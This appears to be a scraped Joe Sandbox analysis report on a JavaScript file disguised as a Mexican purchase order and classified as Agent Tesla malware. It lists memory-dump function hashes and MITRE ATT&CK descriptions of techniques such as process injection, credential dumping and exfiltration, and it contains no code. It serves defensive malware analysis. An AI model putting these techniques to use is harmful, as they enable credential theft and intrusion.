API String ID:
Opcode ID: 399238ce4704964593b4f3be6a212a531411350976db181d540de1a81b2993e8
Instruction ID: f1c03f8004336f9fb3a1d5bda86facaa467268201d947fd75a72970bb22500df
Opcode Fuzzy Hash: 399238ce4704964593b4f3be6a212a531411350976db181d540de1a81b2993e8
Instruction Fuzzy Hash: 2921E0B1D01259AFCB00DF9AD884BCEFFB4FB49314F10812AE918A7210C374A994CFA5

Function 06823940 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09bd4b09653d5d1abd302ae1d1c4578e123c4b275d1b80da8ad2f016fa0704c
Instruction ID: 5ebc56daa8d285e67cf134bc2de2a14fe8fdba5737a7177a6ac09a7941357c6c
Opcode Fuzzy Hash: b09bd4b09653d5d1abd302ae1d1c4578e123c4b275d1b80da8ad2f016fa0704c
Instruction Fuzzy Hash: 4311AFB5D01259AFCB00DF9AD884BDEFFB4FB49324F50812AE918A7250C374A954CFA5

Function 06823EC8 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecb71649dc89e174d638121cde5711995dfe2360a9bb4a4bdcc05e705917c25
Instruction ID: 86edadbe06f34a93c62782e2d72c0466d58ddc981562ec4739f4b4c441210539
Opcode Fuzzy Hash: fecb71649dc89e174d638121cde5711995dfe2360a9bb4a4bdcc05e705917c25
Instruction Fuzzy Hash: 13018131B001261FDB64956EA420B2FB3EADBC9B64F24843AF30EC7345DAA5DC428395

Function 0682EE70 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90d47f4ab570afec351c17e4f894ec2c633115a56eb0c05ae0687242fa236b64
Instruction ID: 077564c5ffdb4e3eaee4f770fb5327dc0ee069ffa2ab225352be2c2f8fad3b59
Opcode Fuzzy Hash: 90d47f4ab570afec351c17e4f894ec2c633115a56eb0c05ae0687242fa236b64
Instruction Fuzzy Hash: 3901A435B000225FCB64996D94A4B6E73DBE7C9620F24883DE20EC7340EE21DC428399

Function 0682A3E0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead772b5b5d3e77bdea40f65e46545c7ddc6330f1a467bd3b11148c407875517
Instruction ID: 5871e859898f1abd111e87ff5ac535f083d95a4f89eeeacf85a6d3e43af14ef2
Opcode Fuzzy Hash: ead772b5b5d3e77bdea40f65e46545c7ddc6330f1a467bd3b11148c407875517
Instruction Fuzzy Hash: 3D018131B001264FCB64A66DE464B1EB3DAEB89714F108439E60AC7348DE21DC868781

Function 06826540 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 724c558535acc8d02fa62c8b1aac70c06e00d8005d48d30920731ae120d3fe1f
Instruction ID: ac60818c46b9277b4475ac1784c8395eeb8735c36887863b2a01bd1f20347893
Opcode Fuzzy Hash: 724c558535acc8d02fa62c8b1aac70c06e00d8005d48d30920731ae120d3fe1f
Instruction Fuzzy Hash: 23F02B70D052AA6FDB90CE748F8A35E3BA89B02208F2049E5D608CB117F432DEC2C351

Non-executed Functions

Function 06827770 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$^q, xrefs: 068278E1
$^q, xrefs: 06827D00
$^q, xrefs: 068278B0
$^q, xrefs: 06827D16
$^q, xrefs: 068278D5
$^q, xrefs: 06827C61
$^q, xrefs: 06827C6D
$^q, xrefs: 06827D0C
$^q, xrefs: 06827D22
$^q, xrefs: 068278A4

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2222239885
Opcode ID: b2bb38db505f5b342cf1871dc02435271d0a53b773593e2ed12d6c4a1cfa8ae5
Instruction ID: 69f46b4a97a3fc65f35c4aa31c659646366cdf72cf65c7c1245ed2e00a4a3a63
Opcode Fuzzy Hash: b2bb38db505f5b342cf1871dc02435271d0a53b773593e2ed12d6c4a1cfa8ae5
Instruction Fuzzy Hash: B512FD30E0122ACFDB64DF69C954AADB7F2BF84704F208569D50AEB358DB309D85CB91

Function 0682E470 Relevance: 4.3, Strings: 3, Instructions: 587COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0682E6D0
0oAp, xrefs: 0682E508
DqAp, xrefs: 0682E514

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: 0oAp$DqAp$PH^q
API String ID: 0-3365528505
Opcode ID: f148ea403ca4e3f5fe0ffe096652459df374a8b153052328d8b016a97531d05a
Instruction ID: 63a6fcd5c641fa86a1568ec1d7e4127e8eb9bb1b3c3caa9e0dd7236acdb7c2ff
Opcode Fuzzy Hash: f148ea403ca4e3f5fe0ffe096652459df374a8b153052328d8b016a97531d05a
Instruction Fuzzy Hash: A422E430B001168FDB54DB28C498A6DB7F2FF89310F14856AE50ADB3A5DB71EC85CB95

Function 068259AB Relevance: 2.9, Strings: 2, Instructions: 425COMMON

Download Yara Rule

Strings

XPcq, xrefs: 06825AF5
\Ocq, xrefs: 06825B25

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: XPcq$\Ocq
API String ID: 0-2802517751
Opcode ID: eed6d7830550cc51b014589dacd9354caf9bd228de83b3fbda2c16504a7dbc7a
Instruction ID: 335d2cdb83f51a119f92a254b2eb79ec17f24bb0f34bb41181d01809247ee961
Opcode Fuzzy Hash: eed6d7830550cc51b014589dacd9354caf9bd228de83b3fbda2c16504a7dbc7a
Instruction Fuzzy Hash: E3E11631B101268FCB54DB78D4846AEBBF2FF89710F25846AE506DB361DA31DC81C792

Function 06820040 Relevance: 2.0, Instructions: 1989COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a3f1f6118d13b2cca42972e032e4728b4d999d495594c6ec87348cd04b16c91
Instruction ID: 666f265224e498456c40a69e960367059b66b61d93b39dc08b6c303a08e8ce14
Opcode Fuzzy Hash: 3a3f1f6118d13b2cca42972e032e4728b4d999d495594c6ec87348cd04b16c91
Instruction Fuzzy Hash: 6923E931D1061A8EDB10EF68C89099DF7B1FF99300F25C79AD558A7221EB70AAD5CF81

Function 0681E128 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959382299.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6810000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8735ae549d734b56d02c691c118d26be365da1ec6484a68e852feee684938a
Instruction ID: bec5cbb7bcedf3ac9a9343ffa3bd536a5c365800ae44c967f1ce783c3aee5086
Opcode Fuzzy Hash: 4e8735ae549d734b56d02c691c118d26be365da1ec6484a68e852feee684938a
Instruction Fuzzy Hash: 56A16D32E002098FCF59DFB4C8885AEB7B6FF85301B15456AE906EF261DB71E945CB80

Function 068124F1 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2959382299.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6810000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd038a4404d7432df36516a1401b27c83f7cc383ace9ffe440c2baa46d827ba
Instruction ID: eb05e0bc05ce6fb5791147b9016d9840218092563ead10cef2cce9fee7e04fbd
Opcode Fuzzy Hash: dbd038a4404d7432df36516a1401b27c83f7cc383ace9ffe440c2baa46d827ba
Instruction Fuzzy Hash: E0814D71D002098FDFA0CF99C894AEEBBF5FB49310F15842AE659EB251D334DA81CB61

Function 0682AA00 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$^q, xrefs: 0682AAF6
$^q, xrefs: 0682AB02
$^q, xrefs: 0682ABB2
$^q, xrefs: 0682AB7C
$^q, xrefs: 0682AB5D
$^q, xrefs: 0682AB51
$^q, xrefs: 0682ABBE
$^q, xrefs: 0682AB88

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 2b50d8d1b64ad2bcacf071a56ed13918125407d2915acaf969ba0d99a82699ee
Instruction ID: 20535715e50a86676516470ddb194960453ba5fc854b1183790f8a80e076a631
Opcode Fuzzy Hash: 2b50d8d1b64ad2bcacf071a56ed13918125407d2915acaf969ba0d99a82699ee
Instruction Fuzzy Hash: 84916C30A0021EDFEB68DF69D954B6EB7F2FF84704F108529E502EB294DB759885CB90

Function 06827170 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 0682760C
$^q, xrefs: 068274B8
.5vq, xrefs: 068271CB
$^q, xrefs: 06827684
$^q, xrefs: 068274AC
$^q, xrefs: 06827452
$^q, xrefs: 06827678

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: e7c23f860c7f113e3a5a85c672d9a2eea45e60d020fbb7b7554e34ef87395717
Instruction ID: 24c490a99a6cf4e95bd89fe80c59a55195efc906e1ee7fb0580b6e793cd5a627
Opcode Fuzzy Hash: e7c23f860c7f113e3a5a85c672d9a2eea45e60d020fbb7b7554e34ef87395717
Instruction Fuzzy Hash: C0F12E30A0131ACFDB55EF69D594A5EBBB2FF84300F248569D5069B398DB31DC86CB81

Function 068284A0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 0682875F
$^q, xrefs: 068286FA
$^q, xrefs: 0682876B
$^q, xrefs: 06828706

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 50459b7309d6ddbffb140aac68ce511d89855fc00d12481196adde07c845600d
Instruction ID: 599047ae04e68fe708e4da7446320ee1b0e03a1343e9f36ceeddb9bec86286c2
Opcode Fuzzy Hash: 50459b7309d6ddbffb140aac68ce511d89855fc00d12481196adde07c845600d
Instruction Fuzzy Hash: 37B12C70E0121A8FDB64EF69D59465EB7B2FF84300F248929D506DB394DB75DC8ACB80

Function 068288B8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR^q, xrefs: 068289FA
$^q, xrefs: 06828943
LR^q, xrefs: 068289AB
$^q, xrefs: 06828937

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 37781daed8c4a3ce59a8164640db8dba183119817745096e96a667af7623d865
Instruction ID: e2a3cb09f44cdf986efbdf0eabf893baa816e492a8b0a062456e4491f50674cc
Opcode Fuzzy Hash: 37781daed8c4a3ce59a8164640db8dba183119817745096e96a667af7623d865
Instruction Fuzzy Hash: 3E51C370B002168FDB54EB29D450A6EB7E2FF89304F148569E506DB3A9DB31EC85CB91

Function 0682AD88 Relevance: 5.2, Strings: 4, Instructions: 167COMMON

Download Yara Rule

Strings

$^q, xrefs: 0682AF0C
$^q, xrefs: 0682AF3B
$^q, xrefs: 0682AF64
$^q, xrefs: 0682AEB9

Memory Dump Source

Source File: 00000006.00000002.2959512208.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6820000_InstallUtil.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 08c44617281051be4e20ce3933f8247757d2283ab0662d943f96276353a8d43b
Instruction ID: de562d5f1ab0cbc2f64c152bfbb0f89481de8a1aacb5bd298ced766c6db24e09
Opcode Fuzzy Hash: 08c44617281051be4e20ce3933f8247757d2283ab0662d943f96276353a8d43b
Instruction Fuzzy Hash: 5D519374E1021A9FCF69DA68D980AAEB7F2FF84300F108929D506DB354DB35DC86CB91

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1wqamkt.kjh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm5vlvn3.2rn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tp0er5yo.oen.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vngjswvz.hmq.psm1

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.js

Function 00007FFD9B935FF2 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 535
COMMON

Function 00007FFD9B937A01 Relevance: 1.8, APIs: 1, Instructions: 319
processCOMMON

Function 00007FFD9B93833D Relevance: 1.7, APIs: 1, Instructions: 212
injectionCOMMON

Function 00007FFD9B937E39 Relevance: 1.7, APIs: 1, Instructions: 186
threadCOMMON

Function 00007FFD9B938529 Relevance: 1.6, APIs: 1, Instructions: 136
threadCOMMON

Function 00007FFD9BA029E9 Relevance: 1.2, Instructions: 1155
COMMON

Function 00007FFD9BA01BB1 Relevance: .7, Instructions: 676
COMMON

Function 00007FFD9BA00948 Relevance: .4, Instructions: 366
COMMON

Function 00007FFD9BA02168 Relevance: .3, Instructions: 324
COMMON

Function 00007FFD9BA00C79 Relevance: .3, Instructions: 292
COMMON

Function 00007FFD9BA009EA Relevance: .1, Instructions: 141
COMMON

Function 00007FFD9BA00D2A Relevance: .1, Instructions: 70
COMMON

Function 00007FFD9BA01FB8 Relevance: .0, Instructions: 49
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
